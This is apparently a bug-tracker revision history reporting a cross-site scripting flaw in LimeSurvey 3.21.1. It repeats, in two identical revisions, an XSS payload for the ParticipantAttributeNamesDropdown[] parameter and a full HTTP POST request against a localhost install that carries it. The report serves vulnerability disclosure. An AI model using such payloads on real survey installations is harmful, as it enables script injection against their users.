View Revisions: Issue #15672

Summary 15672: LimeSurvey 3.21.1 Cross Site Scripting
Revision 2020-05-04 09:43 by ollehar
Additional Information
Vulnerable parameter: ParticipantAttributeNamesDropdown[]
Attack vector: test<input><svg+"/onmouseover="confirm('AttDropdown');//"onload=onload>so5cx\\\"onmouseover=alert('AttDropdown');//><iframe/onmouseover=alert('AttDropdown')></iframe>//


HTTP POST Request:

POST /limesurvey3.21.1/index.php/admin/participants/sa/editAttributeName HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 739
Origin: http://localhost
Connection: close
Referer: http://localhost/limesurvey3.21.1/index.php/admin/participants/sa/attributeControl
Cookie: LS-WIGSLJDTCJQVXTND=obtbddm0i3ddpiroojm04s8smu; LS-TRVXSHABVTHDTKHE=u56nldt5edh2rb1ljo71f3dh0o; PHPSESSID=gptp9k9bi8jcscu1ttid3pbvq8; LS-OOSUJAAJFRZHZYBG=hh6vpf8f8oomcnaqc03h2qcpdm; YII_CSRF_TOKEN=eGthZG9JTGZ1d2RHcHk3bGUyT1R5X1pCOHd5Nkp5eFMG8lWciXbJNQCd-EOnoJN1jIMWEo3pj4aYbFBa-FAXIA%3D%3D

YII_CSRF_TOKEN=eGthZG9JTGZ1d2RHcHk3bGUyT1R5X1pCOHd5Nkp5eFMG8lWciXbJNQCd-EOnoJN1jIMWEo3pj4aYbFBa-FAXIA%3D%3D&oper=edit&ParticipantAttributeName%5Battribute_id%5D=1&ParticipantAttributeName%5Bdefaultname%5D=test&ParticipantAttributeName%5Battribute_type%5D=DD&ParticipantAttributeName%5Bvisible%5D=TRUE&ParticipantAttributeNamesDropdown%5B%5D=%3Cinput%3E%3Csvg%2B%22%2Fonmouseover%3D%22confirm('AttDropdown')%3B%2F%2F%22onload%3Donload%3Eso5cx%5C%5C%5C%22onmouseover%3Dalert('AttDropdown')%3B%2F%2F%3E%3Ciframe%2Fonmouseover%3Dalert('AttDropdown')%3E%3C%2Fiframe%3E%2F%2F&ParticipantAttributeName_addLanguage_language=&ParticipantAttributeNameLanguages%5Ben%5D=&dummyParticipantAttributeNameLanguages=&dummyParticipantAttributeNamesDropdown=
Revision 2019-12-17 21:41 by misheljava
Additional Information
Vulnerable parameter: ParticipantAttributeNamesDropdown[]
Attack vector: test<input><svg+"/onmouseover="confirm('AttDropdown');//"onload=onload>so5cx\\\"onmouseover=alert('AttDropdown');//><iframe/onmouseover=alert('AttDropdown')></iframe>//


HTTP POST Request:

POST /limesurvey3.21.1/index.php/admin/participants/sa/editAttributeName HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 739
Origin: http://localhost
Connection: close
Referer: http://localhost/limesurvey3.21.1/index.php/admin/participants/sa/attributeControl
Cookie: LS-WIGSLJDTCJQVXTND=obtbddm0i3ddpiroojm04s8smu; LS-TRVXSHABVTHDTKHE=u56nldt5edh2rb1ljo71f3dh0o; PHPSESSID=gptp9k9bi8jcscu1ttid3pbvq8; LS-OOSUJAAJFRZHZYBG=hh6vpf8f8oomcnaqc03h2qcpdm; YII_CSRF_TOKEN=eGthZG9JTGZ1d2RHcHk3bGUyT1R5X1pCOHd5Nkp5eFMG8lWciXbJNQCd-EOnoJN1jIMWEo3pj4aYbFBa-FAXIA%3D%3D

YII_CSRF_TOKEN=eGthZG9JTGZ1d2RHcHk3bGUyT1R5X1pCOHd5Nkp5eFMG8lWciXbJNQCd-EOnoJN1jIMWEo3pj4aYbFBa-FAXIA%3D%3D&oper=edit&ParticipantAttributeName%5Battribute_id%5D=1&ParticipantAttributeName%5Bdefaultname%5D=test&ParticipantAttributeName%5Battribute_type%5D=DD&ParticipantAttributeName%5Bvisible%5D=TRUE&ParticipantAttributeNamesDropdown%5B%5D=%3Cinput%3E%3Csvg%2B%22%2Fonmouseover%3D%22confirm('AttDropdown')%3B%2F%2F%22onload%3Donload%3Eso5cx%5C%5C%5C%22onmouseover%3Dalert('AttDropdown')%3B%2F%2F%3E%3Ciframe%2Fonmouseover%3Dalert('AttDropdown')%3E%3C%2Fiframe%3E%2F%2F&ParticipantAttributeName_addLanguage_language=&ParticipantAttributeNameLanguages%5Ben%5D=&dummyParticipantAttributeNameLanguages=&dummyParticipantAttributeNamesDropdown=